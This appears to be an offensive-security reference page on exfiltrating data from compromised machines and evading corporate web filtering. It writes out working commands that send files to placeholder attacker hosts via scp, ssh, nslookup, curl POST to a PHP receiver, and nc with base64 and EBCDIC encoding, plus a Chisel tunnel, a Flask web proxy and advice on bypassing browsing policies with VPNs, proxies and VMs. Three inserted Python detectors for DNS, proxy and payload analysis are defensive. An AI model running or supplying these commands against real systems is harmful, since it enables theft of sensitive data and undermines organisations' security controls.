Data Exfiltration

Secure Copy Protocol (SCP)

Secure Copy Protocol (SCP) is used to transfer files from the compromised system to an external server controlled by the attacker. Using SSH key authentication, encrypted connections are established to move large volumes of data without raising suspicion, as SCP is commonly allowed in environments with remote administration. The traffic appears as legitimate connections, and misconfigured firewall policies can allow this data to exit without further inspection.

scp {file} user@IP:/{directory}

We can also exfiltrate directly with ssh:

tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"

# Compress-Archive cannot write to stdout, so archive to a file first and copy it over SSH
Compress-Archive -Path C:\path\to\datafolder -DestinationPath C:\path\to\datafolder.zip
scp C:\path\to\datafolder.zip root@<attacker_ip>:/tmp/datafolder.zip

DNS

DNS exfiltration leverages name resolution traffic to covertly transfer data. This method encapsulates sensitive information within DNS queries and responses, allowing data to travel outside the target network through a channel that is rarely monitored in depth. Using tools such as nslookup, iodine, dnscat2, or custom scripts, data is fragmented and sent as part of DNS requests to a server controlled by the attacker. Because DNS traffic is essential for network connectivity and its inspection is usually superficial, this method allows for effective and difficult-to-detect exfiltration, masquerading as legitimate name resolution traffic.

For example, to do this with nslookup:

nslookup.exe 'secret.data'.attacker-controlled-domain.com
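A defender-side counterpart to the technique above, added here as an example and not part of the original page: the script scans a constructed resolver query log for the two traces that label-based exfiltration leaves behind, high-entropy data-carrying labels and many distinct subdomains of one zone from a single client. The log format, the thresholds and the last-two-labels zone heuristic are assumptions.

```python
import math
from collections import defaultdict

# Constructed sample of a resolver query log (timestamp, client IP, queried name); not real traffic.
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.0.5 www.example.com
2024-05-01T10:00:02 10.0.0.5 mail.example.com
2024-05-01T10:00:03 10.0.0.5 login.microsoftonline.com
2024-05-01T10:00:04 10.0.0.7 c2VjcmV0IGRhdGEgY2h1bmsgMQ.attacker-controlled-domain.com
2024-05-01T10:00:05 10.0.0.7 c2VjcmV0IGRhdGEgY2h1bmsgMg.attacker-controlled-domain.com
2024-05-01T10:00:06 10.0.0.7 c2VjcmV0IGRhdGEgY2h1bmsgMw.attacker-controlled-domain.com
2024-05-01T10:00:07 10.0.0.7 c2VjcmV0IGRhdGEgY2h1bmsgNA.attacker-controlled-domain.com
2024-05-01T10:00:08 10.0.0.7 c2VjcmV0IGRhdGEgY2h1bmsgNQ.attacker-controlled-domain.com
2024-05-01T10:00:09 10.0.0.9 static.cdn.example.net
"""

ENTROPY_THRESHOLD = 3.5     # bits/char; base64 or hex labels sit well above ordinary hostnames
MIN_DATA_LEN = 20           # short labels such as "www" or "mail" are never data carriers
UNIQUE_SUBDOMAIN_LIMIT = 5  # distinct subdomains of one zone seen from one client

def shannon_entropy(text):
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_name(qname):
    """Split 'a.b.example.com' into ('a.b', 'example.com').
    Assumption: the zone is the last two labels (no public-suffix list is consulted)."""
    labels = qname.rstrip('.').split('.')
    return '.'.join(labels[:-2]), '.'.join(labels[-2:])

def find_suspicious_zones(log_text):
    """Return {zone: set(reasons)} for zones whose queries look like an exfiltration channel."""
    reasons = defaultdict(set)
    seen = defaultdict(set)  # (client, zone) -> distinct subdomain strings
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname = line.split()
        data, zone = split_name(qname)
        if len(data) >= MIN_DATA_LEN and shannon_entropy(data) >= ENTROPY_THRESHOLD:
            reasons[zone].add('high-entropy-subdomain')
        seen[(client, zone)].add(data)
        if len(seen[(client, zone)]) >= UNIQUE_SUBDOMAIN_LIMIT:
            reasons[zone].add('many-unique-subdomains')
    return dict(reasons)
```

Running find_suspicious_zones over the sample reports only attacker-controlled-domain.com, with both reasons; the legitimate zones trip neither rule.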

HTTPS Custom Web

Create a web with file upload capabilities and SSL.

The updog Python module can be used.

HTTP Custom Web

Create a web with file upload capabilities without SSL.

updog, Python's http.server, Apache and others can be used.

Quick exfil using POST method and curl:

On attacker machine:

Create a contact.php file in the web root that writes the raw request body to /tmp/datafolder.base64:

<?php file_put_contents('/tmp/datafolder.base64', file_get_contents('php://input')); ?>

On victim machine:

curl --data "$(tar zcf - /tmp/datafolder | base64)" https://<attacker_ip>/contact.php

On attacker machine:

cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar

File Sharing and Storage Webs

Web exfiltration can be done using popular online storage and collaboration services, such as repository platforms, cloud storage, or file sharing sites, to transfer sensitive data outside of the controlled environment. This method leverages organizations' reliance on legitimate and commonly used services, allowing data traffic to go undetected by masquerading as authorized activity.

Some of these websites include:

  • GitHub

  • Dropbox

  • Pastebin

  • Slack

  • Discord

  • Imgur

  • WeTransfer

  • Wormhole

Text via Web Exfiltration

This method uses file upload forms, RESTful APIs, or scripts injected into compromised websites to exfiltrate data directly from the victim's computer to web servers controlled by the attacker. The data can be fragmented and sent in small portions to avoid detection, using encryption or steganography methods to disguise the exfiltrated content. Exfiltration leverages standard HTTP(S) connections, evading detection by proxies and content filtering systems.

Some of these websites include:

  • AnonFiles

  • Hastebin

  • 0bin

  • ControlC

  • JustPaste.it

  • File.io

  • Gofile.io

  • PrivateBin

Cloud Services

Exfiltration via cloud services, such as Google Drive, OneDrive or Dropbox, uses the APIs of these services to automatically upload files from the compromised machine to an account controlled by the attacker. These services are commonly allowed on enterprise networks and their HTTPS-encrypted traffic makes it easy to evade security controls and outbound data monitoring systems. By disguising the transfer as legitimate synchronization or normal cloud usage, data can be exfiltrated without raising alerts in intrusion detection tools.

Some of these services include:

  • Google Drive

  • Gmail

  • OneDrive

  • Yahoo!

  • Dropbox

  • Outlook

Instant Messaging

This method is based on using messaging services such as Slack, Telegram, or WhatsApp to send files or data directly through bots or automated scripts. These services are usually allowed and used in corporate environments, so their traffic goes unnoticed. In addition, end-to-end encryption and the use of official APIs facilitate data exfiltration without alerting monitoring systems.

Some of these services include:

  • WhatsApp

  • Telegram

  • Signal

  • Slack

  • Discord
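As an added example that is not from the original page, covering the curl POST channel above as well as the file-sharing, paste, cloud and messaging services listed in the sections above: a review of a constructed forward-proxy log that flags uploads to bare IP addresses, uploads to known sharing services, and oversized single or cumulative uploads per client and host. The log format, the hostnames and the byte thresholds are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed forward-proxy log sample (time, client, method, host, bytes sent by client); not real traffic.
SAMPLE_PROXY_LOG = """\
10:01:00 10.0.0.5 GET www.example.com 512
10:01:05 10.0.0.5 POST login.microsoftonline.com 2048
10:02:00 10.0.0.7 POST 203.0.113.10 52428800
10:03:00 10.0.0.8 PUT content.dropboxapi.com 15728640
10:03:30 10.0.0.8 PUT content.dropboxapi.com 15728640
10:03:45 10.0.0.8 PUT content.dropboxapi.com 15728640
10:04:00 10.0.0.9 POST pastebin.com 4096
10:05:00 10.0.0.9 POST api.telegram.org 3000000
"""
# Illustrative hostnames for services named above (assumed; a real rule set would use the proxy's URL categories)
SHARING_HOSTS = {'github.com', 'content.dropboxapi.com', 'pastebin.com', 'api.telegram.org',
                 'discord.com', 'file.io', 'gofile.io', 'wetransfer.com'}
UPLOAD_METHODS = {'POST', 'PUT'}
SINGLE_UPLOAD_LIMIT = 10 * 1024 * 1024  # 10 MiB in one request
AGGREGATE_LIMIT = 40 * 1024 * 1024      # 40 MiB from one client to one host over the log window

def is_ip_literal(host):
    # A request to a bare IP instead of a hostname, as in the curl POST to <attacker_ip> above
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def find_suspicious_uploads(log_text):
    """Return a list of (client, host, reason) tuples for uploads an analyst should review."""
    findings = []
    totals = defaultdict(int)  # (client, host) -> bytes uploaded so far
    for line in log_text.strip().splitlines():
        _time, client, method, host, sent = line.split()
        if method not in UPLOAD_METHODS:
            continue
        sent = int(sent)
        if is_ip_literal(host):
            findings.append((client, host, 'upload-to-ip-literal'))
        if host in SHARING_HOSTS:
            findings.append((client, host, 'upload-to-file-sharing-service'))
        if sent >= SINGLE_UPLOAD_LIMIT:
            findings.append((client, host, 'large-single-upload'))
        before = totals[(client, host)]
        totals[(client, host)] = before + sent
        if before < AGGREGATE_LIMIT <= before + sent:  # report once, when the threshold is crossed
            findings.append((client, host, 'high-aggregate-upload'))
    return findings
```

The small POST to the login page is left alone, while the 50 MiB POST to an IP literal and the three 15 MiB PUTs to the storage API each produce findings.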

Base64 Encoding

Data exfiltration using Base64 encoding allows an attacker to encode sensitive data in a textual format before sending it over the network, which helps evade detection systems that might flag binary data or certain file types.

The Base64-encoded data can be exfiltrated over HTTP, email, or any other protocol.

Linux/MacOS Base64 Encode:

cat sensitive_data.txt | base64 > encoded_data.txt

Linux/MacOS Base64 Decode:

cat encoded_data.txt | base64 --decode > decoded_data.txt

Windows PowerShell Encode:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\to\sensitive_data.txt"))

Windows PowerShell Decode:

[IO.File]::WriteAllBytes("C:\path\to\decoded_data.txt", [Convert]::FromBase64String([IO.File]::ReadAllText("C:\path\to\encoded_data.txt")))

TCP Socket with EBCDIC and Base64

First start Listener:

nc -lvnp 80 > datafolder.tmp

Exfiltrate data from the target Linux machine:

tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic | nc <attackerIP> 80

Exfiltrate data from the target Windows machine:

# Compress-Archive cannot write to stdout, so archive to a file and encode that file
Compress-Archive -Path C:\temp\datafolder -DestinationPath C:\temp\datafolder.zip
[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\temp\datafolder.zip")) |
Out-File C:\temp\encoded_data.txt -Encoding ascii
# Convert to EBCDIC (IBM code page 037; on PowerShell 7 register System.Text.CodePagesEncodingProvider first) and send over TCP
$ebcdic = [System.Text.Encoding]::GetEncoding(37).GetBytes((Get-Content C:\temp\encoded_data.txt -Raw))
[System.IO.File]::WriteAllBytes("C:\temp\ebcdic_data.txt", $ebcdic)

# Run from cmd.exe so the pipe passes the raw bytes unchanged
type C:\temp\ebcdic_data.txt | nc <attackerIP> 80

Decode on the listener side:

dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar

tar xf datafolder.tar
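For scoping an incident, the analyst who finds a file produced by the listener above has to undo the wrapping to see what left the network; the same check covers plain Base64 payloads from the previous section. This added example, not from the original page, detects and strips the EBCDIC and base64 layers from a constructed capture. It assumes dd's conv=ebcdic table agrees with IBM code page 037 for the base64 alphabet, which holds for every character base64 emits.

```python
import base64
import binascii
import re

# Constructed sample: the bytes a listener (nc -lvnp 80 > datafolder.tmp) would have written
# after a tar | base64 | dd conv=ebcdic pipeline ran over a small file; not real data.
SECRET = b"customer list: alice, bob\n"
CAPTURED = base64.encodebytes(SECRET).decode('ascii').encode('cp037')

BASE64_RE = re.compile(rb'^[A-Za-z0-9+/=\r\n]+$')

def looks_like_base64(data):
    """True if data uses only the base64 alphabet (line breaks allowed) and decodes cleanly."""
    if not data or not BASE64_RE.match(data):
        return False
    try:
        base64.b64decode(data)
        return True
    except (binascii.Error, ValueError):
        return False

def unwrap_payload(raw):
    """Peel the EBCDIC and base64 wrappers off a captured payload.
    Returns (layers_removed, recovered_bytes); unrecognised data is returned unchanged."""
    layers = []
    data = raw
    if not looks_like_base64(data):
        # Assumption: dd's conv=ebcdic table matches IBM code page 037 on the base64 alphabet
        try:
            candidate = data.decode('cp037').encode('ascii')
        except (UnicodeDecodeError, UnicodeEncodeError):
            return layers, data
        if looks_like_base64(candidate):
            layers.append('ebcdic')
            data = candidate
    if looks_like_base64(data):
        layers.append('base64')
        data = base64.b64decode(data)
    return layers, data

if __name__ == '__main__':
    removed, recovered = unwrap_payload(CAPTURED)
    print(removed, recovered)
```

In the pipeline on this page the recovered bytes are the gzip tarball, so tar xf on the result is still the final step.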

Navigation to websites related to cloud storage is usually blocked by organizations.

To evade these policies, the techniques below can be employed.

- Browser Extensions

Some of the VPN Extensions that may allow us to bypass navigation policies include:

  • Hola VPN

  • CyberGhost VPN

  • Hide Me

  • NordVPN

- HTTP/Socks Proxies

Modern web browsers support HTTP and SOCKS proxies, allowing users to redirect their traffic through intermediary servers.

Some free proxies can be found at https://proxyscrape.com/free-proxy-list.

Once a proxy is obtained, one can access the proxy settings, for example, of the browser, set its IP and port, and access previously restricted sites.

- Web Proxy

A web proxy is a service accessible through a web browser that allows users to access other websites anonymously. It works like a website that is accessed by entering the URL of the desired destination. The web proxy sends the request to the destination site and returns the response to the user, hiding the user's IP address and allowing circumvention of geo-restrictions and censorship.

! A web proxy is used through a browser and a specific website.

! The web proxy is limited to browser web traffic, while the HTTP proxy can handle HTTP traffic from multiple applications.

Some web proxies are as follows:

  • proxyium.com

It is difficult to have an up-to-date inventory of all those websites on the Internet that offer this type of service, so you can always find one that works.

In addition, there are open source software products (which allow anyone to make modifications) such as Interstellar (https://github.com/UseInterstellar/Interstellar) or Doge Unblocker (https://github.com/DogeNetwork/v4) that let users deploy a web proxy service on their own infrastructure: personal computer, VPS, cloud, etcetera. Therefore, it is virtually impossible to maintain strict control over the use of this technology within an organization.

Simple custom web proxy in python:

from flask import Flask, request, render_template_string, Response
import requests

app = Flask(__name__)

# HTML template with a form to enter the target URL
template = '''
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Web Proxy</title>
</head>
<body>
    <h1>Welcome to Your Web Proxy!</h1>
    <form method="GET" action="/proxy">
        <label for="url">Enter URL to visit:</label><br><br>
        <input type="text" id="url" name="url" placeholder="https://www.example.com" style="width: 300px;"><br><br>
        <input type="submit" value="Go">
    </form>
</body>
</html>
'''

@app.route('/')
def index():
    # Render the input form
    return render_template_string(template)

@app.route('/proxy')
def proxy():
    # Get the URL from the query string
    target_url = request.args.get('url')

    if not target_url:
        return "Error: No URL provided.", 400

    try:
        # Make a GET request to the target URL (bounded so a slow target cannot hang the worker)
        response = requests.get(target_url, timeout=10)
    except requests.exceptions.RequestException as e:
        return f"Error: Unable to connect to {target_url}: {str(e)}", 500

    # Return the body with the original status and Content-Type so non-HTML resources render correctly
    return Response(response.content, status=response.status_code,
                    content_type=response.headers.get('Content-Type', 'application/octet-stream'))

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

- SSH Encapsulation

SSH offers dynamic port forwarding: an SSH connection to a remote machine creates an encrypted tunnel that acts as a SOCKS proxy.

Once the SSH connection is established, applications on the machine can be configured to make use of the tunnel, which acts as a SOCKS proxy, e.g. the browser can be configured to redirect all traffic through the tunnel.

Ptunnel can also be used: https://github.com/utoni/ptunnel-ng

- WebSockets Encapsulation

WebSockets are a communication protocol that allows a bidirectional and persistent connection between a client and a server over a single TCP connection. Unlike HTTP, which is unidirectional, WebSockets allow the continuous exchange of real-time data without the need to repeatedly establish new connections.

WebSockets are widely used in applications that require real-time communication, such as online chats, social network updates, multiplayer games and financial applications that display live data.

For traffic encapsulation using WebSockets, the Chisel tool (https://github.com/jpillora/chisel) can be used.

First, a Chisel server must be deployed on a VPS. Then, the Chisel client must be used on the victim machine to establish communication with the server side:

Chisel.exe client -v http://example.com:8080 1080:socks

Once the Chisel connection is established, a SOCKS proxy is generated on the selected local port. You can then, for example, configure your web browser to make use of the generated SOCKS proxy.

- Anonymity Networks and Darknets

This section covers networks designed to provide anonymous communication and browsing. These services can be used to bypass company navigation policies by masking user activity and encrypting data traffic.

- Virtual Network Interfaces

The use of virtual network interfaces allows the creation of network interfaces that act as if they were physical interfaces, although they are actually running in a virtualized environment.

An attacker could set up VMs on the victim machine in order to circumvent browsing restrictions.

For these cases it is interesting to use software that does not require installation on the corporate computer and does not require administrative privileges to create VMs. An example is QEMU (https://www.qemu.org/download/), in which we can build a Debian Linux.

In NAT mode (the default), all traffic generated in the virtual machine leaves as if it were generated on the host (the victim computer), so it is handled by the same controls and the existing website blocking applies to it without further changes.

In bridge mode, on the other hand, the virtual machine has a (virtual) network interface whose IP address belongs to the same network segment as the host (corporate computer). Internally, this type of interface may be handled differently from NAT mode, possibly evading traffic interception on the host. However, it usually requires administrator privileges.
